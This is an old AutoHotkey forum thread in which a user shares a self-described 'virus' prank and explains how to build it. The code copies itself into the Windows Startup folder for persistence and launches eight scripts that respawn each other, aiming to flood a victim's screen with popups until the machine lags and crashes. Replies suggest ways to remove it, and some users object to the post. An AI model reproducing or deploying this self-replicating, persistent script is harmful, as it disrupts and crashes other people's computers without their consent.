AutoHotkey Homepage AutoHotkey Community
Let's help each other out
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Prank script: suggestions?

 
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Scripts & Functions
View previous topic :: View next topic  
Author Message
andrei901



Joined: 20 Jan 2008
Posts: 24

PostPosted: Sun Jun 29, 2008 4:31 am    Post subject: Prank script: suggestions? Reply with quote

I wrote a nine part script which causes huge amounts of popups to appear on the victim's computer, causing it to lag horribly followed by crashing.

by popups i mean 8 popups when you run it, 8^2 after two seconds, 8^3 after 3 seconds, 8^4 after 4 seconds, ect...

suggestions?
Also I challenge someone to put it on their computer and remove it, I will post detailed instructions in three days.

Code:

FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1  ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1  ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1  ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1  ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1  ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1  ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1  ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1  ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1  ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15  ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe                        ; the eight parts of the virus. if one is missing, it wont work


and the eight parts all look like this:

Code:

MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe


How do I post files on here?

To do the challenge, create nine AHK scripts and call them:
Start.ahk
Part 1.ahk
Part 2.ahk
Part 3.ahk
Part 4.ahk
Part 5.ahk
Part 6.ahk
Part 7.ahk
Part 8.ahk

then copy this code into the "Start" script:

Code:

FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1  ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1  ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1  ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1  ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1  ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1  ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1  ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1  ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1  ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15  ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe                        ; the eight parts of the virus. if one is missing, it wont work


And this into the eight parts:

Code:

MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe


then export them all, keep them in one folder, and run Start.exe

then see if you can remove this.

instructions will be posted in 3 days.

should be easy.

-andrei901, your average wannabe AHK expert

[ Moderator!: Title changed ]
Back to top
View user's profile Send private message AIM Address
Hmmm
Guest





PostPosted: Sun Jun 29, 2008 6:18 am    Post subject: Reply with quote

Hmm, are we allowed to use other scripts?

My solution would be to freeze each app, as you don't have #singleinstance fixed... then I'd just delete them 1by1
Back to top
ahklerner



Joined: 26 Jun 2006
Posts: 1213
Location: USA

PostPosted: Sun Jun 29, 2008 7:07 am    Post subject: Reply with quote

i have thought of some improvements....but since viru$'$ are not something that ahk needs tho be known for, i will not post them. I suspect noone else will either.

edit: i also respectfully ask you to change the topic of your post to not include the word. - thx
_________________
Back to top
View user's profile Send private message
Slanter



Joined: 28 May 2008
Posts: 275
Location: Minnesota, USA

PostPosted: Sun Jun 29, 2008 7:16 am    Post subject: Reply with quote

Solutions:
1) Power button -> Boot in safe mode -> Delete virus Laughing
2) on vista... just click no to all the little security thingies...
3) Don't click okay on the popups, open C: delete the .exe files (or really just Part 1.exe), all of the scripts will crash after the message box closes
Back to top
View user's profile Send private message Visit poster's website
TheLeO



Joined: 11 Jun 2005
Posts: 165
Location: England ish

PostPosted: Sun Jun 29, 2008 1:03 pm    Post subject: Reply with quote

One of the biggest pains about using a computer is viruses and spyware.

I don't like anyone developing these type of programs,
They start as a harmless prank, and end up in a full blown virus.
I'd suggest to close this post and if possible delete it.
_________________
And i say: where there is a problem , there is a solution.(well some where that is.)
::
I Have Spoken
::
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
tic



Joined: 22 Apr 2007
Posts: 1356

PostPosted: Sun Jun 29, 2008 4:15 pm    Post subject: Reply with quote

I see you've mastered FileCopy and MsgBox. Congratulations! Rolling Eyes
Back to top
View user's profile Send private message
andrei901



Joined: 20 Jan 2008
Posts: 24

PostPosted: Sun Jun 29, 2008 8:50 pm    Post subject: Reply with quote

slanter: solution #1 was the one i used.

i don't know if you'll be able to find and delete the .exe for any of the parts, (unless you really know what to look for) because this is a lot of popups. I mean 8.5 billion in 11 seconds (8^11).

thank you, tic.
_________________
-andrei901, your local wannabe AHK expert
Back to top
View user's profile Send private message AIM Address
Slanter



Joined: 28 May 2008
Posts: 275
Location: Minnesota, USA

PostPosted: Sun Jun 29, 2008 10:14 pm    Post subject: Reply with quote

andrei901 wrote:
8.5 billion in 11 seconds (8^11).
actually... it will be only 1 popup after 11 seconds... msgbox stops the script at that point until the message box is closed, so you should have a short time before you have any problems.

here's one more solution:
Right click on start.exe's tray icon, and click on exit within 15 seconds of logging on
Back to top
View user's profile Send private message Visit poster's website
Guest






PostPosted: Mon Jun 30, 2008 8:14 am    Post subject: Reply with quote

Code:
#SingleInstance, off
;Run % A_ScriptName
MsgBox,262144,0,HAHA!,1
Back to top
ahklerner



Joined: 26 Jun 2006
Posts: 1213
Location: USA

PostPosted: Mon Jun 30, 2008 8:40 am    Post subject: Reply with quote

Slanter wrote:
Right click on start.exe's tray icon, and click on exit within 15 seconds of logging on

how about just: "Right click on start.exe's tray icon" ?
Code:
MsgBox,262144,No Way!,Hurry!`n`nClick on the scipt's menu!`n`nYou have 10 Seconds!`n`nDon't click exit though,10
MsgBox, Wow you just had an infinite amount of time to close the program!!`n`nWhy didn't you??

_________________
Back to top
View user's profile Send private message
Slanter



Joined: 28 May 2008
Posts: 275
Location: Minnesota, USA

PostPosted: Tue Jul 01, 2008 4:32 am    Post subject: Reply with quote

ahklerner wrote:
how about just: "Right click on start.exe's tray icon" ?

o right lol
Back to top
View user's profile Send private message Visit poster's website
Trikster



Joined: 15 Jul 2007
Posts: 1159
Location: Enterprise, Alabama

PostPosted: Tue Jul 01, 2008 4:34 am    Post subject: Reply with quote

Search the forums for svchost.exe Smile

By far one of the best computer pranks ever.
_________________
ScriptPad/~dieom/dieom/izwian2k7/Trikster/God

Back to top
View user's profile Send private message
andrei901



Joined: 20 Jan 2008
Posts: 24

PostPosted: Thu Jul 03, 2008 3:26 am    Post subject: Reply with quote

alright, but isn't svchost a virus now?
_________________
-andrei901, your local wannabe AHK expert
Back to top
View user's profile Send private message AIM Address
Display posts from previous:   
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Scripts & Functions All times are GMT
Page 1 of 1

 
Jump to:  
You can post new topics in this forum
You can reply to topics in this forum


Powered by phpBB © 2001, 2005 phpBB Group